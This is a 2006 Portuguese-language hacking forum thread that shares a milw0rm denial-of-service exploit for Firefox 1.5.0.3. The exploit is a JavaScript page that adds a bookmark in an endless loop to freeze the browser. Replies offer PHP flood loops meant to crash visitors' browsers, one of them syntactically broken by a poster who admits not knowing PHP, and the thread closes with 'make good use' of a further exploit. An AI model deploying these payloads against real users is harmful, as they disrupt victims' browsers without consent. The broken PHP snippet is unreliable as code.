Mozilla Firefox <= 1.5.0.3 (Loop) Denial of Service Exploit

Started by insanity, 06 de June , 2006, 06:08:04 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

insanity

06 de June , 2006, 06:08:04 PM
Code Select
<html>
<title>Bug</Title>
<body>
<script language="JavaScript1.2" type="text/javascript">

function MainPageBookmark() {title="Gianni Amato"; url="http://www.gianniamato.it/";

if (window.sidebar) { window.sidebar.addPanel(title, url,"");} else if( window.external )

{ window.external.AddFavorite( url, title); } else if(window.opera && window.print) { return true; }}

for (k=0;k<k+1;k++) MainPageBookmark();

</script>
</body>
# milw0rm.com [2006-05-18]

HadeS

#1
06 de June , 2006, 06:53:34 PM
Tem uma falha um pouco recente no Firefox, com as TAGs "". Depois posto um exploit.

Vou dar uma breve explicação. A função MainPageBookmark() adiciona uma página aos favoritos (http://www.gianniamato.it/), e existe o loop FOR, que diz que se K for menor que K+1 (Dããã) ele chama a função MainPageBookmark(), assim o script vai adicionar infinitamente essa página aos favoritos.

HadeS

slul

#2
06 de June , 2006, 09:10:52 PM
tbm da pra fazer um belo DoS em qualquer Navegador com PHP

mas daí o server pode se ferrar tbm neh...


afinal o php eh uma linguagem server side...

exemplo criado por mim agora de looping pra DoS de webbrowser em php


for($x=0; $x<1000000000;$x++){
echo "Esse é o flood número $x

Esse é o flood número $x

Esse é o flood número $x

Esse é o flood número $x

Esse é o flood número $x

Esse é o flood número $x

Esse é o flood número $x

Esse é o flood número $x

Esse é o flood número $x

Esse é o flood número $x

Esse é o flood número $x

Esse é o flood número $x

Esse é o flood número $x

Esse é o flood número $x

Esse é o flood número $x

Esse é o flood número $x

Esse é o flood número $x

Esse é o flood número $x

Esse é o flood número $x

Esse é o flood número $x

";
}

?>

vai ser bem desagradável com certeza =D

HadeS

#3
07 de June , 2006, 09:11:27 PM
Se não me engano, o navegador emite algum aviso quando se depara com um script assim.

Acho que o ideal seria:

Code Select
<?
int x = 0; // HUahuahuah... Não sei declarar variaveis em PHP :P
while(1<2)
{
Esse é o flood número $x<br>
x++;
}
?>
Creio que seria mais eficaz.

HadeS

slul

#4
07 de June , 2006, 09:23:11 PM
Quote from: "HadeS"Se não me engano, o navegador emite algum aviso quando se depara com um script assim.

Acho que o ideal seria:

Code Select
<?
int x = 0; // HUahuahuah... Não sei declarar variaveis em PHP :P
while(1<2)
{
Esse é o flood número $x<br>
x++;
}
?>
Creio que seria mais eficaz.

HadeS

Hehehehe nao emite nada nao afinal so o server sabe o q contem o arquivo php

pelo menos aki meu firefox travou =)

_Dr4k0_

#5
09 de June , 2006, 05:25:52 PM
u.u

legal mas até agora to pensano e não achei algo mto útil que dah para se fazer com isto;//

se eu pensar em algo posto aki
100% Livre!!!Livre para escolher o que há de melhor no Windows e Linux. Livre de preconceito direto ou inverso!
Adote essa filosofia e tenha mais chance de sucesso profissional.

HadeS

#6
14 de June , 2006, 04:10:28 PM
QuoteTem uma falha um pouco recente no Firefox, com as TAGs "". Depois posto um exploit.

Tá aqui o exploit.

Façam bom uso.

HadeS

HadeS

#7
14 de June , 2006, 04:11:51 PM
Print
Go Up Pages1
User actions